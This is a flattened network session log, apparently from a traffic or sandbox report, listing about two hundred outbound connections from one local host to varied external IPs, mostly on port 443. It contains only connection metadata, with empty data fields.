                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10052192.168.2.146086488.84.68.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10053192.168.2.14524681.215.153.59443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10054192.168.2.1436436112.147.160.143443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10055192.168.2.1458504183.181.13.243443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10056192.168.2.1456256174.79.144.236443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10057192.168.2.145136681.180.91.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10058192.168.2.1442536141.136.190.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10059192.168.2.143297242.217.75.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10060192.168.2.1448138206.113.252.162443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10061192.168.2.145537473.187.10.10443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10062192.168.2.1440846195.169.95.228443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10063192.168.2.1433162168.135.152.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10064192.168.2.145658843.25.248.182443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10065192.168.2.143365059.66.220.175443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10066192.168.2.1444932205.72.133.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10067192.168.2.1447020219.174.245.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10068192.168.2.1450956132.114.72.120443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10069192.168.2.1451146223.8.95.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10070192.168.2.1438924219.200.6.223443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10071192.168.2.1444782126.244.17.131443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10072192.168.2.1439932184.57.40.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10073192.168.2.144022074.246.108.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10074192.168.2.1459946129.184.225.71443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10075192.168.2.1442378142.129.193.190443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10076192.168.2.1450950150.51.206.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10077192.168.2.145379473.151.97.118443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10078192.168.2.1449646202.80.236.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10079192.168.2.1455046158.2.193.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10080192.168.2.1444562136.60.183.0443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10081192.168.2.1433948195.18.63.114443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10082192.168.2.144614013.114.221.181443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10083192.168.2.1446452165.110.254.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10084192.168.2.143311266.190.214.8443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10085192.168.2.14509082.143.188.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10086192.168.2.1449472158.6.201.141443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10087192.168.2.1453240125.225.50.159443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10088192.168.2.145514020.112.244.196443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10089192.168.2.144267032.200.10.125443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10090192.168.2.144606845.20.54.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10091192.168.2.145914238.79.170.87443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10092192.168.2.1460362201.28.83.120443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10093192.168.2.14384405.43.238.120443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10094192.168.2.1434250118.190.231.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10095192.168.2.1458324152.213.105.101443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10096192.168.2.145013285.88.67.110443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10097192.168.2.1442248153.169.131.154443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10098192.168.2.1452236197.109.99.60443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10099192.168.2.144090448.13.42.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10100192.168.2.1449086130.249.106.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10101192.168.2.145192495.226.197.33443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10102192.168.2.1456726177.187.60.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10103192.168.2.1439996158.112.207.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10104192.168.2.144725269.251.139.19443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10105192.168.2.1447048112.219.109.120443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10106192.168.2.1441388146.192.146.121443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10107192.168.2.1439860200.46.147.14443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10108192.168.2.1457190216.42.100.47443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10109192.168.2.143670282.175.114.31443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10110192.168.2.1445070210.247.236.55443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10111192.168.2.1449136206.47.143.220443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10112192.168.2.1449044135.205.139.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10113192.168.2.144822612.46.240.172443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10114192.168.2.1460956185.171.138.239443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10115192.168.2.144270480.26.66.172443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10116192.168.2.1434122102.217.96.112443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10117192.168.2.1437938155.171.6.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10118192.168.2.145394483.109.125.185443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10119192.168.2.143545884.203.208.12443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10120192.168.2.1438128101.225.82.37443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10121192.168.2.1440604162.110.240.127443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10122192.168.2.1459428107.229.177.106443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10123192.168.2.1455400129.118.55.67443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10124192.168.2.144993898.25.35.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10125192.168.2.1433682144.233.25.14443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10126192.168.2.1460924123.56.155.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10127192.168.2.143590064.238.138.110443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10128192.168.2.1451872169.26.187.18443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10129192.168.2.145709852.168.54.109443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10130192.168.2.143693234.219.246.13443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10131192.168.2.1449568185.122.231.60443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10132192.168.2.1457706219.10.239.37443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10133192.168.2.143489827.88.136.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10134192.168.2.1439312212.11.88.2443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10135192.168.2.145207658.149.135.253443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10136192.168.2.1435922198.124.60.126443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10137192.168.2.1451266172.37.221.217443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10138192.168.2.1457812143.100.200.62443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10139192.168.2.1459944161.253.124.167443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10140192.168.2.143677466.39.97.41443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10141192.168.2.144590074.101.92.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10142192.168.2.1436916110.79.31.238443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10143192.168.2.1442184134.1.147.148443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10144192.168.2.1450622105.102.188.37443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10145192.168.2.1453000134.16.145.222443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10146192.168.2.1436138194.242.229.208443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10147192.168.2.145579899.197.183.12443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10148192.168.2.1439684190.118.14.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10149192.168.2.1450692220.37.92.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10150192.168.2.1435158124.3.244.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10151192.168.2.1440628193.60.86.9443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10152192.168.2.144822866.25.252.81443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10153192.168.2.1450680200.33.19.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10154192.168.2.1435368131.96.172.68443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10155192.168.2.1439688154.54.67.8443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10156192.168.2.14411065.116.133.87443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10157192.168.2.1455554192.102.175.92443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10158192.168.2.1451002107.117.72.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10159192.168.2.14443621.25.255.137443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10160192.168.2.1436414183.83.101.2443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10161192.168.2.1440810186.62.222.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10162192.168.2.145411431.44.205.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10163192.168.2.1444634105.4.244.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10164192.168.2.1433788202.84.228.191443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10165192.168.2.144582442.155.147.201443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10166192.168.2.145229457.245.255.152443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10167192.168.2.144244877.179.190.38443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10168192.168.2.144078069.245.84.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10169192.168.2.1438090102.205.187.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10170192.168.2.1443002153.109.67.44443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10171192.168.2.143720497.58.243.141443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10172192.168.2.1450720171.242.245.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10173192.168.2.14425964.140.139.229443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10174192.168.2.143981832.132.234.176443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10175192.168.2.145514299.6.241.189443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10176192.168.2.145982688.210.180.217443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10177192.168.2.1443942137.174.220.125443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10178192.168.2.1447322212.190.221.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10179192.168.2.144868225.48.58.101443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10180192.168.2.1459978207.164.42.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10181192.168.2.144737275.164.88.178443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10182192.168.2.1459100141.199.130.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10183192.168.2.1457848136.60.150.222443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10184192.168.2.144769457.95.177.226443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10185192.168.2.144265469.172.72.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10186192.168.2.1455434186.48.68.118443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10187192.168.2.1444720129.107.165.19443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10188192.168.2.145210245.192.244.112443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10189192.168.2.144990020.180.26.108443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10190192.168.2.1439690114.223.216.117443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10191192.168.2.1454792223.13.66.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10192192.168.2.1440456219.72.5.7443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10193192.168.2.1458550195.207.114.87443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10194192.168.2.14436749.64.91.122443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10195192.168.2.1439350159.83.9.240443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10196192.168.2.1445446158.165.213.37443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10197192.168.2.144214071.147.14.189443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10198192.168.2.1433322217.107.206.129443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10199192.168.2.1440174166.212.159.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10200192.168.2.143889064.122.38.154443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10201192.168.2.1450542211.17.39.245443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10202192.168.2.14365302.1.15.61443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10203192.168.2.145969486.157.124.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10204192.168.2.1436262141.18.249.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10205192.168.2.144132043.249.220.898080
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10206192.168.2.1459298217.150.223.2128080
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10207192.168.2.145256280.35.168.228443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10208192.168.2.1445882169.104.90.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10209192.168.2.1437548100.218.15.235443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10210192.168.2.1433538217.204.148.118443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10211192.168.2.144667666.150.101.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10212192.168.2.144831883.58.217.237443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10213192.168.2.145228043.27.70.92443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10214192.168.2.1443242118.242.146.53443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10215192.168.2.1433678119.243.244.191443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10216192.168.2.1438922128.136.22.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10217192.168.2.1460930200.37.166.183443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10218192.168.2.145496639.14.131.160443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10219192.168.2.1447644170.26.102.158443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10220192.168.2.143521871.242.19.1443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10221192.168.2.144263243.158.54.201443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10222192.168.2.1444044222.60.70.41443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10223192.168.2.145490035.82.146.225443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10224192.168.2.1459782155.21.69.237443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10225192.168.2.14330424.129.161.159443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10226192.168.2.1436614218.172.134.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10227192.168.2.144246485.18.29.82443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10228192.168.2.1459698160.26.65.184443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10229192.168.2.1458578198.206.158.7443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10230192.168.2.1434688137.81.70.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10231192.168.2.1446350109.18.106.141443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10232192.168.2.1436778120.108.24.64443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10233192.168.2.144713488.182.40.39443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10234192.168.2.1455270118.117.152.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10235192.168.2.143481089.194.136.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10236192.168.2.1458368208.127.44.91443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10237192.168.2.1445084107.1.4.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10238192.168.2.145166291.232.58.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10239192.168.2.1445846218.69.196.157443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10240192.168.2.144671668.142.156.244443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10241192.168.2.145389867.35.59.141443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10242192.168.2.1458370156.142.70.48443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10243192.168.2.145491682.48.125.174443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10244192.168.2.1454098182.127.0.141443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10245192.168.2.1449112114.149.97.47443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10246192.168.2.1455472185.30.37.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10247192.168.2.1440804128.208.230.246443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10248192.168.2.1434156138.113.195.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10249192.168.2.144561444.147.158.188443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10250192.168.2.1444868151.73.249.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10251192.168.2.1459538140.225.77.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10252192.168.2.1448256150.86.126.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10253192.168.2.1448438161.251.179.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10254192.168.2.1442704134.243.190.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10255192.168.2.1452562144.16.168.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10256192.168.2.1458088146.81.186.193443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10257192.168.2.1443956116.201.234.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10258192.168.2.1436780195.131.16.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10259192.168.2.1438800103.26.181.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10260192.168.2.144582493.108.194.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10261192.168.2.144802642.139.107.226443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10262192.168.2.143442064.215.156.120443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10263192.168.2.1450846171.149.187.127443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
